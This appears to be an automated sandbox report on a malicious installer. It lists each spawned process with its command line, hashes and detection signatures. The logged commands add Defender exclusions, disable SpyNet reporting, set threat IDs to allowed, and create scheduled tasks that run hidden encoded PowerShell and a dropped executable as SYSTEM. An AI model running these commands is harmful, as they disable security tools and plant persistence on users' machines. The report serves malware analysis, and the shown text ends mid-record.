|
C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe
|
.\Install.exe
|
 |
|
| Is windows: |
false
|
| Is dropped: |
true
|
| PID: |
5784
|
| Target ID: |
1
|
| Parent PID: |
5820
|
| Name: |
Install.exe
|
| Path: |
C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe
|
| Commandline: |
.\Install.exe
|
| Size: |
6549032
|
| MD5: |
3ADC95B09B9644E908114624326E8D0B
|
| Time: |
17:13:29
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
low
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x400000
|
| Modulesize: |
163840
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Dropped file seen in connection with other malware |
System Summary |
|
| Drops PE files |
Persistence and Installation Behavior |
|
| Spawns processes |
System Summary |
|
|
|
C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe
|
.\Install.exe /S /site_id "525403"
|
|
|
| Is windows: |
false
|
| Is dropped: |
true
|
| PID: |
5796
|
| Target ID: |
2
|
| Parent PID: |
5784
|
| Name: |
Install.exe
|
| Path: |
C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe
|
| Commandline: |
.\Install.exe /S /site_id "525403"
|
| Size: |
7079936
|
| MD5: |
6F52A47480DAE7C97A64DD5AEBB8E426
|
| Time: |
17:13:30
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
moderate
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x13a0000
|
| Modulesize: |
165466112
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Dropped file seen in connection with other malware |
System Summary |
|
| Drops PE files |
Persistence and Installation Behavior |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32®
ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
5960
|
| Target ID: |
6
|
| Parent PID: |
5888
|
| Name: |
cmd.exe
|
| Class: |
cmd
|
| Path: |
C:\Windows\SysWOW64\cmd.exe
|
| Commandline: |
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32®
ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
|
| Size: |
232960
|
| MD5: |
F3BDBE3BB6F734E357235F4D5898582D
|
| Time: |
17:13:35
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
high
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x11d0000
|
| Modulesize: |
364544
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
5140
|
| Target ID: |
8
|
| Parent PID: |
5960
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:13:35
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
high
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32®
ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
4544
|
| Target ID: |
9
|
| Parent PID: |
5868
|
| Name: |
cmd.exe
|
| Class: |
cmd
|
| Path: |
C:\Windows\SysWOW64\cmd.exe
|
| Commandline: |
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32®
ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
|
| Size: |
232960
|
| MD5: |
F3BDBE3BB6F734E357235F4D5898582D
|
| Time: |
17:13:35
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
high
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x11d0000
|
| Modulesize: |
364544
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
4496
|
| Target ID: |
10
|
| Parent PID: |
5960
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:13:35
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
4668
|
| Target ID: |
11
|
| Parent PID: |
4544
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:13:35
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
1332
|
| Target ID: |
12
|
| Parent PID: |
4544
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:13:35
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
1252
|
| Target ID: |
13
|
| Parent PID: |
5796
|
| Name: |
schtasks.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\schtasks.exe
|
| Commandline: |
schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
|
| Size: |
185856
|
| MD5: |
15FF7D8324231381BAD48A052F85DF04
|
| Time: |
17:13:37
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbb0000
|
| Modulesize: |
204800
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Uses schtasks.exe or at.exe to add and modify task schedules |
Boot Survival |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /run /I /tn "gUpzuvmWb"
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
1244
|
| Target ID: |
15
|
| Parent PID: |
5796
|
| Name: |
schtasks.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\schtasks.exe
|
| Commandline: |
schtasks /run /I /tn "gUpzuvmWb"
|
| Size: |
185856
|
| MD5: |
15FF7D8324231381BAD48A052F85DF04
|
| Time: |
17:13:38
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbb0000
|
| Modulesize: |
204800
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Uses schtasks.exe or at.exe to add and modify task schedules |
Boot Survival |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
4744
|
| Target ID: |
17
|
| Parent PID: |
1084
|
| Name: |
powershell.exe
|
| Class: |
powershell
|
| Path: |
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
| Commandline: |
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
|
| Size: |
447488
|
| MD5: |
95000560239032BC68B4C2FDFCDEF913
|
| Time: |
17:13:39
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
false
|
| Is elevated: |
false
|
| Modulebase: |
0x7ff7fbaf0000
|
| Modulesize: |
458752
|
| Wow64: |
false
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Suspicious powershell command line found |
Data Obfuscation |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /DELETE /F /TN "gUpzuvmWb"
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
5956
|
| Target ID: |
19
|
| Parent PID: |
5796
|
| Name: |
schtasks.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\schtasks.exe
|
| Commandline: |
schtasks /DELETE /F /TN "gUpzuvmWb"
|
| Size: |
185856
|
| MD5: |
15FF7D8324231381BAD48A052F85DF04
|
| Time: |
17:13:39
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbb0000
|
| Modulesize: |
204800
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Uses schtasks.exe or at.exe to add and modify task schedules |
Boot Survival |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:15:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe\"
d8 /site_id 525403 /S" /V1 /F
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
5176
|
| Target ID: |
21
|
| Parent PID: |
5796
|
| Name: |
schtasks.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\schtasks.exe
|
| Commandline: |
schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:15:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe\"
d8 /site_id 525403 /S" /V1 /F
|
| Size: |
185856
|
| MD5: |
15FF7D8324231381BAD48A052F85DF04
|
| Time: |
17:13:42
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbb0000
|
| Modulesize: |
204800
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Uses schtasks.exe or at.exe to add and modify task schedules |
Boot Survival |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe
|
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe d8 /site_id 525403 /S
|
|
|
| Is windows: |
false
|
| Is dropped: |
true
|
| PID: |
5880
|
| Target ID: |
23
|
| Parent PID: |
1084
|
| Name: |
fdKxpPd.exe
|
| Path: |
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe
|
| Commandline: |
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe d8 /site_id 525403 /S
|
| Size: |
7079936
|
| MD5: |
6F52A47480DAE7C97A64DD5AEBB8E426
|
| Time: |
17:13:46
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xc80000
|
| Modulesize: |
165466112
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Drops PE files |
Persistence and Installation Behavior |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\"
/t REG_SZ /d 6 /reg:64;"
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
5976
|
| Target ID: |
24
|
| Parent PID: |
5880
|
| Name: |
powershell.exe
|
| Class: |
powershell
|
| Path: |
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
| Commandline: |
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\"
/t REG_SZ /d 6 /reg:64;"
|
| Size: |
430592
|
| MD5: |
DBA3E6449E97D4E3DF64527EF7012A10
|
| Time: |
17:13:49
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xed0000
|
| Modulesize: |
442368
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Suspicious powershell command line found |
Data Obfuscation |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction"
/f /v 225451 /t REG_SZ /d 6 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
4764
|
| Target ID: |
33
|
| Parent PID: |
5976
|
| Name: |
cmd.exe
|
| Class: |
cmd
|
| Path: |
C:\Windows\SysWOW64\cmd.exe
|
| Commandline: |
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction"
/f /v 225451 /t REG_SZ /d 6 /reg:32
|
| Size: |
232960
|
| MD5: |
